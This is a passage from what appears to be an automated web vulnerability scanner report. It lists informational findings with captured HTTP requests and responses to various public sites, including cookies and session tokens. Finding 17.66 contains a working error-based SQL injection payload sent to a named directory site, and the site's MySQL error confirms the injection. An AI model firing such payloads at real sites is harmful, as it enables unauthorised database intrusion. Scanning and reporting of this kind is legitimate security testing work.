User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 01:55:28 GMT
Server: Apache/2
Vary: Host,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8066


   document.write('<scr' + 'ipt type="text/javascript">');
document.write('    var jobthread_tbi_job_index = 0;');

document.write('    function jobthread_tbi_prev_job()');
document.write('    {');
document.wri
...[SNIP]...

17.50. http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://techcrunch.com
Path:   /2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/

Request

GET /2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/?cf_action=sync_comments&post_id=276072 HTTP/1.1
Host: techcrunch.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=75736080.1298773822.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-228159185-1298773822293; __utma=75736080.1073528764.1298773822.1298773822.1298773822.1; __utmc=75736080; __utmb=75736080.1.10.1298773822; s_pers=%20s_getnr%3D1298773823354-New%7C1361845823354%3B%20s_nrgvo%3DNew%7C1361845823357%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; _chartbeat2=9ty1isxoua91z7jc

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Feb 2011 02:32:39 GMT
Content-Type: text/html
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Vary: Accept-Encoding
Content-Length: 2

OK

17.51. http://track2.mybloglog.com/js/jsserv.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://track2.mybloglog.com
Path:   /js/jsserv.php

Request

GET /js/jsserv.php?mblID=2008020415264705 HTTP/1.1
Host: track2.mybloglog.com
Proxy-Connection: keep-alive
Referer: http://www.bloganol.com/2011/02/domain-short-url-google-apps.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=djc1gj56lnh2k&b=3&s=lc; mbl_sid=N2011021604342886

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:16 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" policyref="http://www.mybloglog.com/w3c/p3p.xml"
Expires: Sun, 06 Mar 2011 00:00:00 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6761


<!--
var mbl_recent_visitor='';
var mbl_current_visitor='';
if(typeof(mbl_jsserv_loaded)=='undefined'){var mbl_jsserv_loaded=true;function m_r_e(obj,w,f){if(window.addEventListener){obj.addEventListe
...[SNIP]...

17.52. http://track2.mybloglog.com/tr/urltrk.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://track2.mybloglog.com
Path:   /tr/urltrk.php

Request

GET /tr/urltrk.php?i=2008020415264705&t=1&u=http%3A//www.bloganol.com/2011/02/domain-short-url-google-apps.html&a=Mozilla/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%29%20AppleWebKit/534.13%20%28KHTML%2C%20like%20Gecko%29%20Chrome/9.0.597.98%20Safari/534.13&d=20110227&db=&now=1298824278763&v=N2011022708311672 HTTP/1.1
Host: track2.mybloglog.com
Proxy-Connection: keep-alive
Referer: http://www.bloganol.com/2011/02/domain-short-url-google-apps.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=djc1gj56lnh2k&b=3&s=lc; mbl_sid=N2011021604342886

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:36 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" policyref="http://www.mybloglog.com/w3c/p3p.xml"
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81


<!-- g2w2.mbl.re1.yahoo.com compressed/chunked Sun Feb 27 08:31:36 PST 2011 -->

17.53. http://twitter.com/favorites/tap11.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twitter.com
Path:   /favorites/tap11.json

Request

GET /favorites/tap11.json?callback=TWTR.Widget.receiveCallback_1&since_id=41141417069780992&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1298985415236=cachebust HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://tap11.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129797651447110140; k=173.193.214.243.1298770536066098; __utmz=43838368.1298770586.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=cloudscan.us; __utma=43838368.1964851609.1298770586.1298770586.1298770586.1; __utmv=43838368.lang%3A%20en; original_referer=4bfz%2B%2BmebEmmOypgvjcFrI76cp%2F0VW5A; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOOmj3EuAToHaWQiJWFlZTI4NjFlMWUwYWRi%250ANzcwNzIzZDU2NDgxZTBkMWM4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--6f9e7c86d615d518cfffc20c0a199d42291b51f3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 13:16:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1298985398-53576-33464
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
Last-Modified: Tue, 01 Mar 2011 13:16:38 GMT
X-RateLimit-Remaining: 112
X-Runtime: 0.00838
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1298988963
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOOmj3EuASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWFl%250AZTI4NjFlMWUwYWRiNzcwNzIzZDU2NDgxZTBkMWM4--64ec2fa43fa21d0e517171985c328c8a624f6c78; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 34

TWTR.Widget.receiveCallback_1([]);

17.54. http://wd.sharethis.com/api/getCount.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wd.sharethis.com
Path:   /api/getCount.php

Request

GET /api/getCount.php?url=http%3A%2F%2Fwww.bloganol.com%2F2011%2F02%2Fdomain-short-url-google-apps.html HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.bloganol.com/2011/02/domain-short-url-google-apps.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 145

var __stCount={"url":"http:\/\/www.bloganol.com\/2011\/02\/domain-short-url-google-apps.html","facebook2":8,"facebook":2,"twitter":5,"total":13};

17.55. http://widgets.dzone.com/links/dwr/interface/LinkManager.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://widgets.dzone.com
Path:   /links/dwr/interface/LinkManager.js

Request

GET /links/dwr/interface/LinkManager.js HTTP/1.1
Host: widgets.dzone.com
Proxy-Connection: keep-alive
Referer: http://widgets.dzone.com/links/widgets/zoneit.html?t=1&url=http%3A%2F%2Fdavidwalsh.name%2Fgoogle-url&title=Google%20URL%20Shortener%20PHP%26nbsp%3BClass
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=aaaEQbwbVZHxW4wmn9N5s

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:30:33 GMT
Server: Apache/2.2.11 (Unix) DAV/2 SVN/1.5.5 Resin/4.0.4 PHP/5.2.13
Cache-Control: max-age=300
Expires: Sun, 27 Feb 2011 16:35:33 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 2733


function LinkManager() { }
LinkManager._path = '/links/dwr';

LinkManager.getLinkById = function(p0, callback) {
DWREngine._execute(LinkManager._path, 'LinkManager', 'getLinkById', p0, callback);
...[SNIP]...

17.56. http://www.adexchanger.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.adexchanger.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.adexchanger.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-hmcbjmko=4D8E3C5C38D8691EBBE9E1E09B67B9AC; __gads=ID=30fd460374f02124:T=1298985688:S=ALNI_MbhwAHcnhJV4c2H-sXaLt1R-8N73w; __utmz=20437352.1298985750.1.1.utmcsr=liveintent.com|utmccn=(referral)|utmcmd=referral|utmcct=/company.php; __utma=20437352.896767388.1298985741.1298985741.1298985741.1; __utmc=20437352; __utmb=20437352.1.10.1298985741

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Wed, 07 Jan 2009 05:09:07 GMT
Content-Length: 497
Date: Tue, 01 Mar 2011 13:21:42 GMT
X-Varnish: 1893705058 1893664464
Age: 271
Connection: keep-alive
Via: 1.1 varnish 172.17.66.59
X-Cache: HIT

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.bdH...........X.*v.....N ........ ...L .b.....t ....@.....0..@.... ..Ya..{- -.p..+...P....y ........lU...C....}..3...."K
...[SNIP]...

17.57. http://www.adexchanger.com/wp-admin/admin-ajax.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.adexchanger.com
Path:   /wp-admin/admin-ajax.php

Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.adexchanger.com
Proxy-Connection: keep-alive
Referer: http://www.adexchanger.com/email/liveintent/
Origin: http://www.adexchanger.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-hmcbjmko=4D8E3C5C38D8691EBBE9E1E09B67B9AC
Content-Length: 43

action=wpp_update&token=7a87a5f3c0&id=33088

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Tue, 01 Mar 2011 13:21:59 GMT
X-Content-Type-Options: nosniff
Connection: Keep-Alive
Content-Length: 2

OK

17.58. http://www.atlanticyachtandship.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.atlanticyachtandship.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.atlanticyachtandship.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109637845.1298825537.1.1.utmcsr=companypond.com|utmccn=(referral)|utmcmd=referral|utmcct=/atlanticays; __utma=109637845.236278928.1298825537.1298825537.1298825537.1; __utmc=109637845; __utmb=109637845.1.10.1298825537; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:25 GMT
Server: Apache
Last-Modified: Wed, 10 Jun 2009 15:36:13 GMT
ETag: "2f859b-57e-46c003c38d540"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ............................................................................................................nc..sg..xm..........`M...|..........@#..A$..B%..D(..H,..G,..J
...[SNIP]...

17.59. http://www.bloganol.com/wp-admin/admin-ajax.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bloganol.com
Path:   /wp-admin/admin-ajax.php

Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.bloganol.com
Proxy-Connection: keep-alive
Referer: http://www.bloganol.com/2011/02/domain-short-url-google-apps.html
Origin: http://www.bloganol.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 42

action=wpp_update&token=27b3682737&id=6070

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:15 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 2

OK

17.60. http://www.capgemini.com/img/skin/flag_2.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.capgemini.com
Path:   /img/skin/flag_2.png

Request

GET /img/skin/flag_2.png HTTP/1.1
Host: www.capgemini.com
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 28 Feb 2011 17:50:04 GMT
Content-Type: image/png
Content-Length: 462
Last-Modified: Thu, 05 Nov 2009 11:50:59 GMT
Connection: keep-alive
Accept-Ranges: bytes

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.................................................................
...[SNIP]...

17.61. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Request

GET /extern/login_status.php?api_key=740134c914e9a2bb31abef0af5d22c88&extern=0&channel=http%3A%2F%2Fwww.project-syndicate.org%2F%3Ffbc_channel%3D1&locale=en_GB HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=JiRbTdDJf_XFhA08IkStxmSX; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dkomonews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.komonews.com%252Fweather%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.52.198.53
X-Cnection: close
Date: Sun, 27 Feb 2011 02:18:13 GMT
Content-Length: 60

Given URL is not permitted by the application configuration.

17.62. http://www.google.com/buzz/api/button.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /buzz/api/button.js

Request

GET /buzz/api/button.js HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: enabled=0; NID=44=X-QIlN36SuAju9K9Sqs0vNKg6frf-ZEF-KP1FKK-Nl9b4YeeBHvLLNCarcWymWNRRn9QNuurcYCJgmNV-w5HFCLTrtIsbeOcjPyNdXzXMRdzlLK8sXldK9-rLXcoFXwg; __utmx=173272373.; __utmxx=173272373.; S=static_files=8yY1lAZwM4I; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298773490:GM=1:SG=1:S=dqtVgMFs0_Y480ZC

Response

HTTP/1.1 200 OK
Expires: Sun, 27 Feb 2011 02:33:47 GMT
Date: Sun, 27 Feb 2011 02:28:47 GMT
Last-Modified: Wed, 23 Feb 2011 18:46:18 GMT
Content-Type: text/javascript; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Age: 104
Cache-Control: public, max-age=300
Content-Length: 26698

if(!window.__google_buzz_loaded__){var google_buzz__base_url = 'http://www.google.com/buzz';
var google_buzz__img_url = 'http://www.gstatic.com/buzz/api/images';
var google_buzz__buzz_this_msgs={"ln":
...[SNIP]...

17.63. http://www.google.com/recaptcha/api/reload  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /recaptcha/api/reload

Request

GET /recaptcha/api/reload?c=03AHJ_VuvGEPBJH1nrJ0PDIk2adiORwL9_F6GGMss7HBhj-95av0c3po_bUzFkRDRgCUK8EtA_ybF7ld81i_RaAeeRMN6eeIPIOFcBw_sRWADDmvD3b6QWM_g_evVGznxfn-jNGtEWE08HrGPjqeP72secvdMUO3FSqg&k=6LfaKbwSAAAAAH09yPfwlTk8HO_bfgSLA2hFPlVW&reason=v&type=image&lang=en HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.google.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Tue, 01 Mar 2011 15:06:18 GMT
Content-Type: text/javascript
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 201

Recaptcha.finish_reload('03AHJ_VuuRTY647_PXYVtTC7viZEsIyT1axCfM7_6Spka2Q_tb0W54RQLSJ5LfhCx5a4BJvwM2YvLluj7u30gsz-ufp4IXf1eLA9CBha_3U0x3hXeuyvm1Kd0oH6WT-AynjoJPAyi3prwyHIAHn-BK8lWR2SE8wjFzCQ', 'image')
...[SNIP]...

17.64. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Request

GET /search?sourceid=chrome&ie=UTF-8&q=hoyt.et HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: enabled=0; NID=44=X-QIlN36SuAju9K9Sqs0vNKg6frf-ZEF-KP1FKK-Nl9b4YeeBHvLLNCarcWymWNRRn9QNuurcYCJgmNV-w5HFCLTrtIsbeOcjPyNdXzXMRdzlLK8sXldK9-rLXcoFXwg; __utmx=173272373.; __utmxx=173272373.; S=static_files=8yY1lAZwM4I; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298821971:GM=1:SG=1:S=pvmrcqQCns7scSVe

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 15:53:12 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298821992:GM=1:SG=1:S=WQ17Nxc9zO1viQVB; expires=Tue, 26-Feb-2013 15:53:12 GMT; path=/; domain=.google.com
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 20370

f94-wCe9....S....o..    ..#...|.....*."<!doctype html><head><title>hoyt.e.5E..maHNqTYjsDMT7lweptKH_AQ",kEXPI:"17259,18167,20782,28454,28662,28832,28986,29013,29063",kCSI:{e:"17259,18167,20782,28454,28662
...[SNIP]...

17.65. http://www.kingdee.com/en/js/index/v2008/Index.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kingdee.com
Path:   /en/js/index/v2008/Index.js

Request

GET /en/js/index/v2008/Index.js HTTP/1.1
Host: www.kingdee.com
Proxy-Connection: keep-alive
Referer: http://www.kingdee.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=AAE5198184C24027871D29FEA2C037E3

Response

HTTP/1.0 200 OK
Server: nginx/0.8.49
Date: Sun, 27 Feb 2011 23:48:02 GMT
Content-Type: text/javascript
ETag: W/"4355-1214533448916"
Last-Modified: Fri, 27 Jun 2008 02:24:08 GMT
Content-Length: 4355
X-Via: 1.0 tjtg101:8103 (Cdn Cache Server V2.0), 1.0 wzdx168:80 (Cdn Cache Server V2.0)
Connection: keep-alive
Age: 1

...window.onerror = killErrors;
function changeTab(n){
//tab......
var len=5;
for(i=1;i<=len;i++){
    document.getElementById("tab_"+i).style.display=(i==n)?"block":"none";
    do
...[SNIP]...

17.66. http://www.montrealkiosk.com/directory.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.montrealkiosk.com
Path:   /directory.php

Request

GET /directory.php?name=Arts%20&%20Entertainment=3&categoryId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.montrealkiosk.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 01:03:03 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 1212

mysql error: [1062: Duplicate entry '_!@4dilemma:1' for key 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND list
...[SNIP]...

17.67. http://www.networksolutions.com/jsonBrowserInfo.do  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.networksolutions.com
Path:   /jsonBrowserInfo.do

Request

POST /jsonBrowserInfo.do?default-method=javascriptEnabled&data={%22javascriptEnabled%22:%22true%22} HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Origin: http://www.networksolutions.com
x-requested-with: XMLHttpRequest
accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; currency=USD; vertigo=false
Content-Length: 0

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:31:03 GMT
X-powered-by: Servlet/2.5
Content-type: text/html
Date: Sun, 27 Feb 2011 16:31:03 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:31:03 GMT; Path=/
Vary: accept-encoding
Content-Length: 16

{"success":true}

17.68. http://www.networksolutions.com/jsonLogRedVenturesId.do  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.networksolutions.com
